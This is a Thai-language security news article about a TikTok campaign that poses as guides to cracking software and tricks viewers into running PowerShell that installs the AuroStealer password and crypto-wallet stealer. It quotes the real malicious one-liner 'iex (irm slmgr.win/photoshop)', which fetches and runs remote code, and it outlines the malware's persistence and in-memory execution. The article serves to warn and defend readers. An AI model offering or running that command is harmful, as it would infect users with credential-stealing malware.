แฮกเกอร์ใช้วิดีโอ TikTok หลอกแนะนำวิธีแคร็กโปรแกรม แล้วแพร่มัลแวร์

กลุ่มแฮกเกอร์กำลังใช้ TikTok เป็นช่องทางใหม่ในการแพร่กระจายมัลแวร์ โดยใช้วิดีโอหลอกผู้ใช้ให้รันคำสั่ง PowerShell ที่ดูไม่เป็นอันตราย แต่จริงๆ แล้วจะดาวน์โหลดโทรจันขโมยข้อมูลเข้าสู่ระบบและกระเป๋าเงินดิจิทัล

รูปแบบการโจมตี

นักวิจัยด้านความปลอดภัยพบแคมเปญโจมตีที่อาชญากรไซเบอร์ปลอมตัวเป็นผู้ให้บริการเครื่องมือแคร็กโปรแกรมยอดนิยมอย่าง Photoshop, Microsoft Office และ Windows ให้สามารถใช้งานได้ฟรีผ่านวิดีโอ TikTok วิดีโอเหล่านี้มียอด Like มากกว่า 500 ครั้ง แสดงให้เห็นว่ามีผู้ใช้จำนวนมากตกเป็นเหยื่อแล้ว

ในวิดีโอดังกล่าว ผู้โจมตีจะสั่งให้เหยื่อเปิด PowerShell ในโหมด Administrator แล้วรันคำสั่ง iex (irm slmgr.win/photoshop) คำสั่งนี้ใช้ฟังก์ชัน Invoke-Expression ดึงสคริปต์จากเซิร์ฟเวอร์ที่เป็นอันตรายมาทำงานทันที เทคนิคนี้คล้ายกับการโจมตีแบบ ClickFix ที่เคยเกิดขึ้นบนบล็อกของ Microsoft

การทำงาน

เมื่อเหยื่อรันคำสั่งดังกล่าว ระบบจะดาวน์โหลด PowerShell payload ที่มีอัตราการตรวจจับบน VirusTotal เพียง 17 จาก 63 โปรแกรมป้องกัน แสดงให้เห็นว่ามัลแวร์นี้ถูกออกแบบมาให้หลบหลีกการตรวจจับได้ดี

สคริปต์จะดาวน์โหลดไฟล์ updater.exe ซึ่งเป็นโทรจัน AuroStealer ที่ออกแบบมาเพื่อขโมยรหัสผ่านที่บันทึกไว้ในเว็บเบราว์เซอร์และกระเป๋าเงินคริปโตเคอเรนซี เพื่อให้อยู่ในระบบได้อย่างถาวร มัลแวร์จะสุ่มเลือกชื่อ scheduled task จากรายการที่ดูถูกต้องตามกฎหมาย เช่น AdobeUpdateTask หรือ WindowsUpdateCheck แล้วสร้าง task ที่จะรัน PowerShell แบบซ่อนหน้าต่างทุกครั้งที่ผู้ใช้ล็อกอินเข้าระบบ

การคอมไพล์แบบออนไลน์

ขั้นตอนที่น่าสนใจที่สุดคือการดาวน์โหลดไฟล์ source.exe ซึ่งใช้เทคนิค self-compiling malware ที่ซับซ้อน ระหว่างการทำงาน มันจะเรียกใช้ตัวคอมไพเลอร์ .NET (csc.exe) เพื่อคอมไพล์ซอร์สโค้ดที่เก็บอยู่ในไฟล์ชั่วคราว .cmdline โค้ดที่ถูกคอมไพล์จะใช้ฟังก์ชัน VirtualAlloc, CreateThread และ WaitForSingleObject ในการจองหน่วยความจำ แทรกเชลล์โค้ดเข้าไปในโปรเซส และสร้างเธรดเพื่อรันโค้ดโดยตรงในหน่วยความจำโดยไม่ต้องเขียนไฟล์ลงดิสก์

เทคนิคการคอมไพล์แบบออนดีมานด์นี้ทำให้การวิเคราะห์แบบสแตติกและการตรวจจับทำได้ยากขึ้นมาก เพราะโค้ดที่เป็นอันตรายจริงๆ จะอยู่เฉพาะในหน่วยความจำชั่วคราวเท่านั้น

ขยายการโจมตีด้วยหลายรูปแบบ

นักวิจัยพบวิดีโอ TikTok เพิ่มเติมจากแคมเปญเดียวกันที่ใช้ล่อหลอกด้วยซอฟต์แวร์อื่นๆ เช่น “Activate Office” และ “Unlock Windows” แสดงให้เห็นว่าผู้โจมตีกำลังพัฒนาเทคนิคโซเชียลเอ็นจิเนียริงเพื่อขยายฐานเหยื่อ

แคมเปญนี้เน้นย้ำถึงกลยุทธ์ที่พัฒนาขึ้นของอาชญากรไซเบอร์ที่นำแพลตฟอร์มวิดีโอสั้นมาใช้เป็นช่องทางแพร่กระจายมัลแวร์แบบ self-compiling ที่รันในหน่วยความจำผ่าน PowerShell ผู้ใช้งานไม่ควรรันคำสั่งใดๆ จากเทอร์มินัลหรือ command line ที่มาจากแหล่งที่ไม่น่าเชื่อถือ โดยเฉพาะจากโซเชียลมีเดีย

ทุกแพลตฟอร์มวิดีโอสั้นคือความเสี่ยง

การโจมตีลักษณะนี้ไม่ใช่ปัญหาของ TikTok เพียงแพลตฟอร์มเดียว แต่เป็นกลยุทธ์ที่เรียกว่า “วิศวกรรมสังคม” หรือ Social Engineering ซึ่งสามารถเกิดขึ้นได้บนทุกแพลตฟอร์มที่มีผู้ใช้จำนวนมาก ไม่ว่าจะเป็น Facebook Reels, Instagram Reels หรือ YouTube Shorts ก็ตาม หัวใจสำคัญคือการหลอกลวงให้ผู้ใช้กระทำการที่เป็นอันตรายด้วยตนเอง เคยมีรายงานการเผยแพร่มัลแวร์ขโมยข้อมูลผ่านวิดีโอบน YouTube ในลักษณะคล้ายกันมาแล้ว

ดังนั้น ผู้ใช้งานจึงควรระมัดระวังและไม่ทำตามคำแนะนำในการรันคำสั่งหรือดาวน์โหลดไฟล์จากแหล่งที่ไม่น่าเชื่อถือบนทุกแพลตฟอร์มโซเชียลมีเดีย

ที่มา